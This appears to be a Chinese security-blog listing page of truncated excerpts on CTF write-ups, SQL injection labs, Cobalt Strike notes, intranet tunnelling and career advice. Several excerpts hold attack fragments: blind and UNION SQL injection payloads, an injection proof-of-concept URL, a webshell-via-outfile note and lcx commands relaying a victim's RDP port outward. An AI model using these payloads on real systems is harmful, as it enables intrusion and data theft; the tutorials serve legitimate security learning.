author：test Ox01 具体环境 War包部署在tomcat,war包使用fastjson解析 tomcat版本 java版本 0x02 尝试是否可以接受请求（也可以没有这一步） 先尝试是否可以收到ldap请求 post数据包如下： POST /fastjson/ HTTP/1.1 Host: x.x.…

网络空间安全数学基础考试要点

网络空间安全数学基础阶的计算不要求那个公式，但是Order几次方要求考试会考原根 Legendre必考多项式计算必考扩域多项式计算同态不考域元素表示本元多项式不考 1.整除 3 ≡ \equiv ≡ 4 mod 7不对吧3 ≡ \equiv ≡ 3 mod 74 ≡ \equiv ≡ 4 （m…

自学网安学习心得/路线规划

趁着今天下班，我花了几个小时整理了下，非常不易，希望大家可以点赞收藏支持一波，谢谢。我的经历： 我 19 年毕业，大学专业是物联网工程，我相信很多人在象牙塔里都很迷茫，到了大三大…

ThinkPHP-Shop2020版本的商城CMS前端SQL注入

0x01、漏洞名描述 ThinkPHP-Shop2020版本的商城CMS前端SQL注入 0x02、fofa "ThinkPHP-Shop"0x03、POC http://x.x.x.x//mobile/index/index2/id/1* 0x04、漏洞复现

社会工程学到底有多可怕？

社会工程学，简称社工，是一门欺骗的艺术，也是网络安全中不可或缺的一部分，不懂社工的人，以为社工是诈骗，懂社工的人才明白它到底有多可怕。一、社会工程学是什么？ 社会工程学是黑客米特尼克在…

越权访问漏洞

越权漏洞越权访问漏洞示意图一、越权访问漏洞简介 1.类型水平越权：通过更换的某个ID之类的身份标识，从而使A账号获得（增删查改）B账号的数据垂直越权：使用低权限身份的账号，发送高权限账号的请求&…

sql注入学习-知识点大合集

目录 （一）sql注入了解： 1.1什么是sql注入 1.2 sql注入的分类 （二）sql注入详解： 2.1.MySQL注入 2.2.1在MySQL注入中，会用到的知识 2.2.2mysql常用语句与常见 2.2.3msyql注入内容详解 2.2…

HCIA--OSPF-开放式最短路径优先协议

学习笔记： 标题解释： open shortest path first 开放式：公有的 *私有动态路由协议：EIGRP，这是思科私有的协议* OSPF采用的算法：spt算法--最短路径算法动态路由协议根据更新特点分为： DV型…

Cisco C9200堆叠升级系统(带外管理)

前言网上关于新型号的堆叠升级内容不是很多，并且用带外管理升级也略有不同，此处做个记录环境：两台C9200L-48T-4X通过堆叠线进行堆叠，所有的外部管理均通过带外管理口进行管理整体升级过程大致如下： 升级流程前…

内核调试环境搭建

内核调试环境搭建目录经过测试好用的内核调试环境搭建过程ubuntu和linux版本查看commit所属的内核版本查看Ubuntu版本号等信息下载与安装内核下载内核ubuntu更换内核手动下载并切换到指定源码用apt下载源码使用git下载对应版本编译并安装linux内核（使用linu…

自学黑客（网络安全），一般人我劝你还是算了吧（自学网络安全学习路线--第一章网络协议基础）

一、自学网络安全学习的误区和陷阱 1.不要试图先成为一名程序员（以编程为基础的学习）再开始学习我在之前的回答中，我都一再强调不要以编程为基础再开始学习网络安全，一般来说，学习编程不但学习周期长，而且…

Windows安全 Tips(2)

Windows安全 Tips(2) 1. 对磁盘进行定期检查磁盘属性–>工具–>检查： 2. 对系统进行实时监控性能监视器可靠性监视器 3. 使用BitLocker保护系统安全 gpedit.msc–>计算机配置–>管理模版–>Windows组件： 4. 利用系统自带的防火…

ctfshow-misc和36D没关系和36D有关系

前言：前几天做题发现了两道题，一个和36D没关系一个和36D有关系，结果做到最后后，没有一个和36D有关系，觉的挺有意思，就在这里分享一下，一点自己的拙见，各位师傅见笑了感谢各位读者&a…

数量关系：高频考点常用解题方法（三）

请点击↑关注、收藏，本博客免费为你获取精彩知识分享！有惊喜哟！！数量关系 11.高频考点常用解题方法-鸡兔同笼、牛吃草鸡兔同笼鸡兔同笼，是中国古代著名典型趣题之一，大约在1500年前，《孙子算经》…

CVE-2018-18086

最近闲来无事，看到青少年CTF平台，感觉对新手还是比较友好的！于是便再次开启了刷题之路，几乎不曾复现过漏洞的我，看到了一系列的帝国/骑士CMS的漏洞复现题目青少年CTF平台：https://www.qsnctf.com/challenge…

kalmarCTF(WEB|EZ)WP

目录前提知识靶场搭建漏洞复现前提知识 file_server一个静态文件服务器，支持真实和虚拟文件系统。它通过将请求的URI路径附加到站点的根路径来形成文件路径。默认情况下，它执行规范的URI；这意味着HTTP重定向将被用于对不以尾部斜线…

《国际联网安全保护管理办法》

1.基本信息 （1997年12月11日国务院批准　1997年12月16日公安部令第33号发布　根据2011年1月8日《国务院关于废止和修改部分行政法规的决定》修订） 2.办法内容第一章　总　则第一条为了加强对计算机信息网络国际联网的安全保护，维护公共…

数据库篇：初始化、建表、配置及调用

微信小程序云开发实战-答题积分赛小程序数据库篇：初始化、建表、配置及调用开通云开发服务点击【云开发】，开通云开发服务；开通服务完成后，方可继续往下操作；题库数据表初始化创建数据表点击【数据库】，然后点击【+】创建数据表；

闲鱼/支付宝自动收货诈骗套路分析

闲鱼/支付宝自动收货套路分析他人闲鱼被骗经历最近发现闲鱼有一种“自动收货”的套路，就是在闲鱼下单后，卖家发一个二维码，称让你支付运费，该二维码以闲鱼之类的logo为诱惑，让你相信是真的运费支付二维码正如上文知…

Kali-linux枚举服务

枚举是一类程序，它允许用户从一个网络中收集某一类的所有相关信息。本节将介绍DNS枚举和SNMP枚举技术。DNS枚举可以收集本地所有DNS服务和相关条目。DNS枚举可以帮助用户收集目标组织的关键信息，如用户名、计算机名和IP地址等，为了获取这些信…

MISC：图片隐写的破解方法.

MISC：图片隐写的破解方法. Misc即杂项，是信息隐藏又称信息伪装，就是通过减少载体的某种冗余，如空间冗余、数据冗余等，来隐藏敏感信息，达到某种特殊的目的。信息隐藏打破了传统密码学的思维范畴&#xff0…

精彩回顾 | 2022（第二届）超级CSO年度评选颁奖盛典

2023年5月13日，2022（第二届）超级CSO年度评选颁奖盛典在上海举行，来自全国各地近200位来宾、业界专家、企业代表、合作伙伴以及CSO/CISO共同出席。本次盛典得到了包括中国网络安全审查技术与认证中心（CCRC）、…

ChatGPT：你真的了解网络安全吗？浅谈攻击防御进行时之网络安全新防御

ChatGPT：你真的了解网络安全吗？浅谈网络安全攻击防御进行时网络安全新防御1. 针对人工智能2. 针对5G和物联网3. 针对云安全4.针对社交工程5. 针对加密技术6. 针对多层次的安全控制总结 ChatGPT（全名：Chat Generative Pre-traine…

Nmap中NSE数据文件分析

Nmap中NSE数据文件分析 1.Nmap中数据文件所在的位置2.暴力穷举时所使用的用户名和密码列表数据文件3.Web应用审计数据文件http-fingerprints.luahttp-sql-errors.lsthttp-web-files-extensions.lsthttp-devframework-fingerprints.luahttp-folders.txtvhosts-default.lstwp-plu…

诞生两年，这个产品便成为腾讯安全的“秘密武器”

腾讯既是企业服务产品的服务商又是使用者，很多产品最原始的出发点最早只是为了解决腾讯自身某一个需求，经过不断地发展完善和业务场景锤炼，最终从进化成一个成熟的企服产品。本系列文章讲述的是这样一组Made in Tencent故事，这是系…

wireshark网络抓包详解

一、简介 Wireshark是一款非常流行的网络封包分析软件，可以截取各种网络数据包，并显示数据包详细信息。为了安全考虑，wireshark只能查看封包，而不能修改封包的内容，或者发送封包。 wireshark能获取HTTP，也…

如何成为一名黑客？小白必学的12个基本步骤

黑客攻防是一个极具魅力的技术领域，但成为一名黑客毫无疑问也并不容易。你必须拥有对新技术的好奇心和积极的学习态度，具备很深的计算机系统、编程语言和操作系统知识，并乐意不断地去学习和进步。如果你想成为一名优秀的黑客，下…

网络安全面试题汇总（附答案）

作为从业多年的网络安全工程师，我深知在面试过程中面试官所关注的重点及考察的技能点。网络安全作为当前信息技术领域中非常重要的一部分，对于每一个从事网络安全工作的人员来说，不仅需要掌握一定的技术能力，更需要具备全面的综合…

2023网络安全工程师面试宝典（附答案）

2023年即将过去一半，先来灵魂三连问： 年初定的目标完成多少了？薪资涨了吗？女朋友找到了吗？ 好了，不扎大家的心了，接下来进入正文。 1、SQL注入的原理是什么？ SQL注入攻击是通过将…

《入侵的艺术》读书心得：第六章：渗透测试中的智慧与愚昧

第六章：渗透测试中的智慧与愚昧这些想法是愚昧的 1.任何期待渗透测试结果是“毫无破绽”、“无懈可击”…都是极其愚昧的： 第一层含义：测试的不可穷尽性原理（同软件测试） 第二层含义：作为优秀甚至只是合…

网络安全大厂面试题汇总

注：本套面试题，已整理成pdf文档，但内容还在持续更新中，因为无论如何都不可能覆盖所有的面试问题，更多的还是希望由点达面，查漏补缺。某大厂一面整理 1、防范常见的 Web 攻击 2、重要协议分布层 3、ar…

Coremail与中科曙光达成战略合作紧抓数字经济大机遇

5月12日，广东盈世计算机科技有限公司（以下简称：Coremail）与曙光信息产业股份有限公司（以下简称：中科曙光）正式签约合作协议、达成战略合作伙伴关系。 Coremail技术副总裁林延中、中科曙光副总裁…

Web安全：Redis 未授权访问漏洞测试.

Web安全：Redis 未授权访问漏洞测试. Redis 默认情况下绑定在 6379 端口，然后如果没有进行添加防火墙规则避免其他非信任来源 IP 访问等相关安全策略，直接暴露在公网上。然后再没有设置密码或者设置了弱密码，因此导致此漏洞的产生…

Less-10（时间盲注）

和上一题差不多，就是单引号变成了双引号 ?id1" and sleep(5)-- 查当前数据库名 ?id1" and if(ascii(substr(database(),1,1))>0,sleep(3),1)-- 查表名 ?id1" and if(ascii(substr((select table_name from information_schema.tables whe…

Less-07

这里要经过很多次测试 ?id1))-- 要用到outfile写入（一句话木马） 不过有两个前置条件： 1.有写入权限 2.知道网站在服务器上的绝对路径 ?id-1 union select 1,basedir,datadir-- basedir()指定了安装MYSQL的安装路径 datadir()指定了安…

Windows安全 Tips(1)

Windows安全 Tips 1. 彻底删除文件，也就是删除的文件不会出现在回收站中，而是直接被移除出去 ShiftDelete通过回收站属性进行设置： 选择第二个选项即可 2. 注册表regedit 3. 组策略编辑器gpedit.msc 4. 手动清空Windows临时文件夹在W…

经常使用的2个google镜像网站

经常使用的2个google镜像网站 https://g.vovososo.comhttps://google.zenith.gq 如果各位大佬还有其他的镜像网站，欢迎在下方留言，互相交流一下

游戏盾的优势

1、TB级防御系统分布式云节点防御集群，可跨地区、跨机房动态扩展防御能力和负载容量，轻松达到TB级防御，结合流量调度中心，能抵御市面上绝大多数DDoS攻击。 2、智能CC防御采用独家研发的IP画像、基因识别等多维算法体系&#xff…

BUUCTF Reverse题 reverse3

BUUCTF Reverse题 reverse3 reverse3 首先，exeinfoPE查看一下，32位，用IDA32打开，找main函数，F5反编译，对伪代码进行分析： __int64 __cdecl main_0() {int v0; // eaxconst char *v1; // eaxs…

网络安全产品（一）FortiSIEM

0x01 概念随着数字化转型席卷每个行业，攻击面急剧增加（并且持续不断），使安全管理变得越来越困难。安全团队努力跟上大量安全设备产生的警报和其他信息的泛滥。而网络安全技能的差距只会使这变得更加困难。基础设施&#xff0c…

CTF中干扰逆向分析的几种技术的介绍和解题思路

CTF中干扰逆向分析的几种技术的介绍和解题思路常见的干扰逆向分析的技术：花指令，反调试，加壳，控制流混淆，双进程保护，虚拟机保护技术 1.花指令这是一种比较简单的技巧，在原始的代码中插入一…

XCTF 攻防世界 Reverse新手题（no-strings-attached）

XCTF 攻防世界 Reverse新手题（no-strings-attached） 和之前的题目一样，先用exeinfoPE查看一下文件有没有被加壳，发现并没有加壳，并且是一个32位的elf文件接下来，直接用IDA32打开即可，先找main…

XCTF 攻防世界 Reverse新手题（logmein）

XCTF 攻防世界 Reverse新手题（logmein） 首先，先用exeinfoPE查看程序有无加壳，得知无壳，并且是一个elf文件，即linux下的文件利用linux的file命令来查看文件，发现是一个64位的程序接下来&#…

XCTF 攻防世界 Reverse新手题（Hello，CTF）

XCTF 攻防世界 Reverse新手题（Hello，CTF） 首先，先利用exeinfoPE看一个附件的exe程序是多少位的，有没有加壳。发现程序是32位的，没有加壳之后便可以用IDA32打开和之前几道题的思路一样，首先还…

利用Python geoip2模块关联ip地址和物理位置（经纬度）

Python geoip2模块关联ip地址和物理位置（经纬度） 注意：在运行代码之前，需要先下载GeoLite2-City.mmdb这个配套的数据库，如果下载有问题的，可以直接去我的资源里下载，我已将资源上传 import ge…

慢速DoS攻击工具slowhttptest(网站压力测试工具）

慢速DoS攻击工具slowhttptest(网站压力测试工具） slowhttptest 低带宽的应用层的慢速DoS工具，即通过与目标服务器保持长期的连接，从而将目标服务器的资源耗尽，达到DoS攻击的目的安装方法 kali中直接安装即可：sudo…

Linux kali 2019.4以及其他版本网址、BT种子（国内可下）

旧版本网址合集（科学上网才能进！） 新版本合集2021.1之后版本（国内镜像站） 2019.4版本迅雷链接： 链接：https://pan.xunlei.com/s/VN1C8DhSO3DgpcEbxk8piiZFA1 提取码：bdp2 复制这段…

Linux 服务器必备的安全设置

这里给大家推荐一款免费迭代二开便捷的商城项目：源码直通车>>> 好不容易买了服务器，如果因为自己的疏忽，被黑客黑掉的话，那真的是太糟糕了！ 下面告诉你一些简单的方法提高服务器的安全系数，我的…

登录授权验证之OAuth2.0

实际应用项目：http://github.crmeb.net/u/long 本文将从几个方面了解和学习使用OAuth2.0。对不对就不管了，反正我也几乎不会用到。ps.有个项目用到了，所以才会有本文。 OAuth2.0介绍和功能微信开放平台和github的OAuth2.0接入应用自己写一个…

入门网络安全：黑客要攻下一台计算机，一般会怎么做

这里给大家推荐一款免费迭代二开便捷的商城项目：源码直通车>>> 郑重声明：本文仅供技术交流，切勿拿去做违法事情很多刚刚入门安全的同学可能比较好奇：黑客到底是如何攻破一个目标的呢？ 这个目标可能是一个…

网络安全学习之C语言版DES加密解密算法的编程与实现

欢迎关注我的个人博客：www.zuzhiang.cn 其实明白了DES算法的流程编程实现是不难的，当然可能会在S盒实现那碰到点问题。下面的DES算法包括加密和解密两个功能，主要有生成16个子密钥和DES算法的主程序组成。输出的信息有16轮子密钥以及每轮的中…

TRACE请求造成XSS

漏洞描述远端WWW服务支持TRACE请求。RFC 2616介绍了TRACE请求，该请求典型地用于测试HTTP协议实现。漏洞危害攻击者利用TRACE请求，结合其它浏览器端漏洞，有可能进行跨站脚本攻击，获取敏感信息，比如cookie中的认证信…

【内网学习笔记】1、内网中常见名词解释

1、工作组工作组 Work Group 是最常见最简单最普通的资源管理模式，就是将不同的电脑按功能分别列入不同的组中，以方便管理。比如在一个网络内，可能有成百上千台工作电脑，如果这些电脑不进行分组，都列在“网上邻居”…

无线学习：OAI环境搭建【无线学习笔记四】

目录 1、换源： 2、设置低时延内核 3、设置最大CPU效率 4、安装docker 5、解压文件导镜像 6、配置路由和包转发 7、修改 config_container 文件 8、修改 run_container 文件 9、运行epc 10、安装 enb 的依赖 11、安装 UHD 12、编译 ENB 13、修改 enb.c…

Error: The node does not have system_traces yet, probably still bootstrapping【无线学习笔记三】

OAI 环境搭建运行 ./config_container 时报如下图错误： Error: The node does not have system_traces yet, probably still bootstrapping Connection error: (Unable to connect to any servers, {192.168.61.2: error(111, "Tried connecting to [(192.16…

无线学习：srsRAN环境搭建【无线学习笔记二】

srsRAN 环境搭建： 文档上的一句话：装上之后找配置文件可以从这里找： By default, all applications will search for confifig fifiles in the user’s home directory (~/.srs) upon startup. 实际的配置文件在下面的目录下： …

XCTF 攻防世界 Reverse新手题(insanity, python-trade)

XCTF 攻防世界 Reverse新手题(insanity, python-trade) 1. insanity 这一题十分的简单，将下载下来的附件直接用IDA打开，查看Hey-View，在最右侧一栏进行查找，大概在后半部分，可以直接看到flag 2. python-trade 首先…

【CS学习笔记】25、邮件防御

0x00 前言 Cobalt Strike 不是什么工作情况都能胜任的工具，因此就需要我们根据不同的情况去做一些辅助工作。最后这几节将学习免杀部分的东西，这一节将主要介绍邮件防御方面的相关概念。 0x01 介绍 1、SPF、DKIM、DMARC SPF、DKIM、DMARC 都是邮件…

【CS学习笔记】23、malleable命令

0x00 前言这节课将来看看如何优化 CS 的攻击载荷，从而使它更方便、隐蔽些。 0x01 malleable 命令和控制 malleable 是一种针对特定领域的语言，主要用来控制 Cobalt Strike Beacon 在开启 teamserver 时，在其命令后指定配置文件即可调用&…

Kali Linux渗透测试扫描阶段常用工具Nmap（1）

扫描阶段Nmap工具的常见使用方法文章目录扫描阶段Nmap工具的常见使用方法前言一、Nmap命令结构二、命令结构简解1. 扫描选项-sS， -sT， -sU， -sA2. timing模版-T0 Paranoid-T1 Sneaky-T2 Polite-T3 Normal-T4 Aggressive-T5 Insane3. 扫描目标…

Windows系统安全获取重要信息的方法(一)

Windows系统安全获取重要信息的方法(一） 1. 系统信息（System information) C:\\>echo %DATE% %TIME% C:\\>hostname C:\\>systeminfo C:\\>systeminfo | findstr /B /C:"OS Name" /C:"OS Version" C:\\>wmic cspro…

Windows系统跟网络相关的常用命令

Windows网络常用命令命令描述ipconfig /all详细的IP配置信息ipconfig /displaydns显示本地DNS缓存netstat -ano显示开放的端口（连接）netstat -anop tcp 1netstat循环netstat -an ｜findstr LISTENING显示LISTENING状态的端口route print路由…

堡垒机是什么？堡垒机有什么用？

一、什么是堡垒机？ 堡垒机，即在一个特定的网络环境下，为了保障网络和数据不受来自外部和内部用户的入侵和破坏，而运用各种技术手段监控和记录运维人员对网络内的服务器、网络设备、安全设备、数据库等设备的操作行为，…

第五届浙江省大学生网络与信息安全竞赛预赛部分WP

文章目录Dijkstra第五届浙江省大学生网络与信息安全竞赛-技能挑战赛Webnisc_easywebnisc_学校门户网站吃豆人吃豆魂买买买01REManyCheckMISC好怪哦Dijkstra 第五届浙江省大学生网络与信息安全竞赛-技能挑战赛 Web nisc_easyweb 打开是phpinfo()，没有flag&#xf…

网络安全学习-Kali中间人攻击

中间人攻击原理/ARP欺骗攻击利用的ARP协议的漏洞ARP协议原理 1)发送ARP广播请求，获取对方MAC地址 2)发送ARP单播应答，攻击人通过发送虚假的ARP应答实现ARP缓存投毒，而受害人无法进行身份验证攻击实验准备三台虚拟机，分别安装…

网络安全学习--动态路由RIP

动态路由基于某种路由协议实现特点：减少管理任务，占用了网络带宽动态路由协议路由器之间用来交换信息的语言度量值跳数、带宽、负载、时延、可靠性、成本按路由执行的算法分类距离矢量路由协议依据从源网络到目标网络所经过的路由的个数…

【CS学习笔记】27、applet渗透测试手法

0x00 前言在开始今天的内容之前，先来看看什么情况下会进行云查杀： 1、首先判断文件是否为正常文件 2、如果判断为可疑文件，则把文件的 hash 上传到云上 3、同时把这个文件标记为可疑文件，而不是正常文件因此可以通过修改我…

【CS学习笔记】26、杀毒软件

0x00 前言这一节将来看看杀毒软件相关的概念，毕竟知己知彼才能百战不殆，最后会介绍一下常见的免杀方法。 0x01 目的常规杀毒软件的目的就是发现已知病毒并中止删除它，而作为攻击者则需要对病毒文件进行免杀处理，从而使杀毒软…

CISP模拟考试题库（附答案）

📚 今日学习目标：CISP👦 创作者：码农玛卡巴卡🎉 个人主页： 码农玛卡巴卡的个人主页题目来源网络，如有侵权请联系删除1、以下对信息安全描述不正确的是A.信息安全的基本要素包括保密性、完整性和…

三大渗透测试框架：metasploit、empire、cobalt strike

📚今日学习目标：三大渗透测试框架👦创作者：码农玛卡巴卡🎉个人主页：码农玛卡巴卡的个人主页文章内容整合自网络，如有侵权请联系删除在渗透测试中，有三个非常经典的渗透测试框架&…

黑客常用工具合集

首先恭喜你发现了宝藏。本文章集成了全网优秀的开源攻防武器项目，包含： 信息收集工具（自动化利用工具、资产发现工具、目录扫描工具、子域名收集工具、指纹识别工具、端口扫描工具、各种插件....etc...）漏洞利用工具&#xff0…

Vulnhub 靶机渗透：SICKOS: 1.2

SICKOS: 1.2 一级目录二级目录三级目录 nmap 扫描端口扫描详细扫描漏洞扫描 web渗透gobuster扫描nikto漏洞扫描思考继续获得立足点提权总结一级目录二级目录三级目录 https://www.vulnhub.com/entry/sickos-12,144/ 靶机IP：192.168.54.30 kali IP: 192.168.5…

一般人不要轻易去自学网络安全（黑客）

笔者本人 17 年就读于一所普通的本科学校，20 年 6 月在三年经验的时候顺利通过校招实习面试进入大厂，现就职于某大厂安全联合实验室。我为啥说自学黑客，一般人我还是劝你算了吧！因为我就是那个不一般的人。首先我谈下对黑客&a…

腾讯安全SOC+荣获“鑫智奖”，助力金融业数智化转型

近日，由金科创新社主办，全球金融专业人士协会支持的“2023鑫智奖第五届金融数据智能优秀解决方案评选”榜单正式发布。腾讯安全申报的“SOC基于新一代安全日志大数据平台架构的高级威胁安全治理解决方案”获评“鑫智奖网络信息安全创新优秀解决方案”。 …

DVWA下载、安装及使用教程，网络安全小白必看！

DVWA是一款基于PHP和mysql开发的web靶场练习平台，集成了常见的Web漏洞。旨在为安全人员测试自己的专业技能和工具提供合法的环境，帮助web开发者更好的理解web应用安全防范的过程； 一、DVMA介绍 DVWA官网 (opens new window)DVWA Github (ope…

黑客工具软件大全

黑客工具软件大全100套给大家准备了全套网络安全梓料，有web安全，还有渗透测试等等内容，还包含电子书、面试题、pdf文档、视频以及相关的网络安全笔记 👇👇👇 《黑客&网络安全入门&进阶学习包》 &a…

IT安全解决方案保护企业网络安全

全球每年报告数以万计的网络安全事件，云解决方案和远程工作的大规模采用意味着大多数组织的攻击面呈指数级增长。采用正确的网络安全解决方案是保护企业免受这些攻击的唯一方法。使用正确IT安全解决方案企业网络安全。 IT安全解决方案 ManageEngine IT安全解决方案…

网络安全实战植入后门程序

在 VMware 上建立两个虚拟机：win7 和 kali。 Kali：它是 Linux 发行版的操作系统，它拥有超过 300 个渗透测试工具，就不用自己再去找安装包，去安装到我们自己的电脑上了，毕竟自己从网上找到，也不…

客户案例：CACTER邮件安全网关解决餐饮企业邮件安全痛点，有效提升防护！

客户背景某大型餐饮企业是一家在全国范围内拥有多家连锁店的知名品牌，以优秀的产品和服务质量，严格的质量控制和管理体系，以及开创性的营销策略，赢得了广泛的客户认可和信任。然而，正因为该企业具有良好的口碑和声誉…

【CS学习笔记】17、登录验证的难点

0x00 前言如果当前账号权限被系统认为是本地管理员权限，那么就可以执行很多管理员才能做的事，接下来就来看一下这样的一个过程是如何工作的，其中会涉及到以下要点： 1、Access Token 登录令牌 2、Credentials 凭证 3、Passwor…

2023年网络安全趋势【网安人必看】

数据安全越来越重要。我国《数据安全法》提出“建立健全数据安全治理体系”，各地区部门均在探索和简历数据分类分级、重要数据识别与重点保护制度。数据安全治理不仅是一系列技术应用或产品，更是包括组织构建、规范制定、技术支撑等要素共同完成数据…

通付盾发布WAAP白皮书，帮助企业应对数字化转型过程中日益高发的网络安全威胁

简介企业数字化转型是数字经济发展的重要一环。面对企业数字化转型过程中的安全问题，WAAP白皮书将对攻击方式、攻击量、攻击来源、行业分布等维度对各类攻击进行详细解读，梳理传统Web应用防护能力的不足，分析日益增长的API防护，…

漏洞复现飞视美视频会议系统 Struts2 远程命令执行漏洞

0x01 阅读须知此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等（包括但不限于）进行检测或维护参考，未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失&…

【CS学习笔记】12、特权提升

0x00 用户账户控制自 Windows vista 开始，Windows 系统引进了用户账户控制机制，即 UACUser Account Control机制，UAC 机制在 Win 7中得到了完善。UAC 与 UNIX 中的 sudo 工作机制十分相似，平时用户以普通权限工作，当…

【CS学习笔记】19、代码执行的方式

0x00 前言实现代码执行的四个步骤： 1、与目标建立信任关系 2、复制可执行文件到目标上 3、在目标上运行可执行文件 4、实现对目标的控制以上是根据视频教程中直译的结果，个人感觉其实这一节叫横向移动的方法更为合适。 0x01 创建可执行文件创…

【CS学习笔记】18、密码哈希散列设置信任

0x00 前言继续上一节密码哈希的部分，在上一节中讲到了使用密码生成用户的令牌，从而取得系统的信任，这一节将介绍使用密码的哈希值来取得系统的信任。 0x01 密码哈希首先使用 hashdump 获取用户的密码哈希值，这里的 beacon 会…

【CS学习笔记】2、如何连接团队服务器

0x00 前言上一篇说了一些有的没的，现在来正式学习Cobalt Strike。 Cobalt Strike使用C/S架构，Cobalt Strike的客户端连接到团队服务器，团队服务器连接到目标，也就是说Cobalt Strike的客户端不与目标服务器进行交互，…

十五、Kali Linux 2 拒绝服务攻击

拒绝服务攻击拒绝服务攻击即是攻击者想办法让目标机器停止提供服务，是黑客常用的攻击手段之一。其实对网络带宽进行的消耗性攻击只是拒绝服务攻击的一小部分，只要能够对目标造成麻烦，使某些服务被暂停甚至主机死机，都属于拒绝服…

十四、Kali Linux 2 无线安全渗透测试

一、如何对路由器进行渗透测试 Routerpwn网站漏洞渗透模块漏洞渗透模块以一个表得形式显示，一共5列： 第1列是漏洞渗透模块的发布时间（Date） 第2列是漏洞渗透模块的种类（Category） 第3列是漏洞渗透模块的…

十三、Kali Linux 2 身份认证攻击

身份认证攻击网络的发展正在逐步的改变我们的生活和工作方式。我们现在越来越依赖网络上各种应用，例如当我们之间在进行通信的时候，通常的方式都会是QQ，微信或者电子邮箱；而当我们进行购物的时候，支付宝，…

三、Kali Linux 2 被动扫描

看起来世界上好像没有任何监狱可以关的住雷布雷斯林，可是他又是怎么完成这些任务的呢？ 1、必须熟悉整个监狱的布局 2、必须摸清看守和犯人日常规律 3、不能孤军奋战，必须得到里应或者外合被动扫描、主动扫描：对一个目…

二、Kali Linux 2 使用基础

一、Kali Linux 2 介绍与安装 1、Kali Linux 2 简介 Kali Linux 2是一个面向专业人士的渗透测试和安全审计的操作系统，它是由之前大名鼎鼎的Back Track系统发展而来。Back Track系统曾经是世界上非常优秀的渗透测试操作系统，取得了极大的成功。之后Off…

AtomCMS“靶场“

AtomCMS文件上传漏洞,xss漏洞文章目录AtomCMS文件上传漏洞,xss漏洞复现过程phpstudy中放置网站源代码mysql中建立网站数据库1.添加环境变量2.建立数据库3.导入数据表1.登录网站2.XSS攻击3.文件上传漏洞sql注入漏洞验证工具:windows11phpstudyAtomCMS2.0 复现过程 phpstudy中…

盘点！网络安全厂商都有哪些？

防火墙/UTM/安全网关/下一代防火墙天融信、山石网科、启明星辰、网御星云、绿盟科技、安恒信息、蓝盾、华为、软云神州、杭州迪普、华清信安、东软、上讯信息、利谱、深信服、360、卫士通、H3C、交大捷普、信安世纪、任子行、上海纽盾、金电网安、亚信安全、北京擎企、金山、君…

14个只有网安人才听得懂的「职场黑话」！

各行各业中基本都有「职场黑话」，网安行业当然也不例外，这些「职场黑话」外行人看可能会一脸懵，但作为一名优秀的网安人来说，你一定要看得懂！ 1、HVV 把“VV”换成“W”，再拿拼音拼一下，懂的都懂…

渗透攻防常用工具总结

对于白帽子来说，在进行渗透测试、代码审计、逆向工程等一系列工作中，都离不开安全工具的支撑，这些工具像一把把利剑，可以大大提高渗透效率。在本篇中，我总结了超多网络安全工具，涉及暴力破解、渗透字典、…

信息安全面试题目汇总（带答案）

1）描述一下外网打点的基本流程？ 外网大点的基本流程主要分为：靶标确认、漏洞探测、漏洞利用、权限获取其最终目的是为了获取靶标的系统权限/关键数据。而在整个打点流程中，信息收集较为重要。掌握靶标情报越多，后续就…

网络安全专业术语英文缩写对照表

因在阅读文献过程中经常遇到各种专业缩写，所以把各种缩写总结了一下。因能力有限，错误在所难免，欢迎进行纠错与补充：https://github.com/piaolin/CSAbbr 点击图片可查看大图本文作者：李逍遥g， 转载请注明…

木马和病毒有何区别？

日常生活中，大家应该都听过“中木马了”、“中病毒了”这两句话，那么木马和病毒到底是什么？二者是一个东西吗？ 一、什么是计算机病毒？ 计算机病毒是指编译者在计算机程序中插入的破坏计算机功能或者破坏数据&#x…

T Wiki 云安全知识文库上线

前言 T Wiki 是一个面向云安全方向的知识库，这一点是和其他文库最大的不同，也许这是国内第一个云安全知识文库？ 搭建这个文库的起因是笔者发现在云安全方向的中文资料属实不多，少有的这些资料也很散乱，于是搭建了这个…

【内网学习笔记】8、powercat 的使用

1、下载安装 powercat powercat 可以视为 nc 的 powershell 版本，因此也可以和 nc 进行连接。 powercat 可在 github 进行下载，项目地址为：https://github.com/besimorhino/powercat 下载下来 powercat.ps1 文件后，直接导入即可…

【内网学习笔记】7、lcx、netcat和socat的使用

1、lcx 使用 lcx 分为 Windows 版和 Linux 版，Linux 版叫 portmap Windows 内网端口转发内网失陷主机 lcx.exe -slave rhost rport lhost lport公网代理主机 lcx.exe -listen lport1 lport2内网失陷主机 lcx.exe -slave 123.123.123.123 4444 127.0.0.1 3389公…

【内网学习笔记】6、ICMP隧道工具使用

1、介绍在内网中，如果攻击者使用 HTTP、DNS 等应用层隧道都失败了，那么或许可以试试网络层的 ICMP 隧道，ICMP 协议最常见的场景就是使用 ping 命令，而且一般防火墙都不会禁止 ping 数据包。因此我们便可以将 TCP/UDP 数据封装…

【内网学习笔记】5、BloodHound 的使用

1、介绍 BloodHound 使用可视化图形显示域环境中的关系，攻击者可以使用 BloodHound 识别高度复杂的攻击路径，防御者可以使用 BloodHound 来识别和防御那些相同的攻击路径。蓝队和红队都可以使用 BloodHound 轻松深入域环境中的权限关系。 BloodHound 通…

Less-12

POST输入 uname1") order by 2#&passwd1&submitSubmit 这个地方很严格，")#都要，如果用--，报错都会有问题（弄的我以为要用单引号，弄了半天） 出现了回显点查找数据库 uname1") …

buuctf-BabyUpload

上传php文件,过滤后缀上传jpg文件上传png文件，和文件类型有关（Content-Type） 所以应该要上传jpg文件类型上传一句话木马就会出现问题，筛查后发现是<?php 改一下木马格式就可以了 <script language"php">…

【CS学习笔记】16、用户枚举三个关键步骤

0x00 前言用户枚举的三个关键步骤： 1、当前账号是否为管理员账号？ 2、哪些账号是域管理员账号？ 3、哪个账号是这个系统上的本地管理员账号？ 0x01 管理员账号第一个关键步骤，发现管理员账号。如果想知道自己是…

【CS学习笔记】11、用户驱动溢出攻击

0x00 前言 Beacon 运行任务的方式是以jobs去运行的，比如键盘记录、PowerShell 脚本、端口扫描等，这些任务都是在 beacon check in 之间于后台运行的。 jobs：查看当前 Beacon 中的任务 jobkill：加上任务 ID，对指定任…

专科网工毕业月入3千到农行年薪16万，我经历了哪些，附学习路线

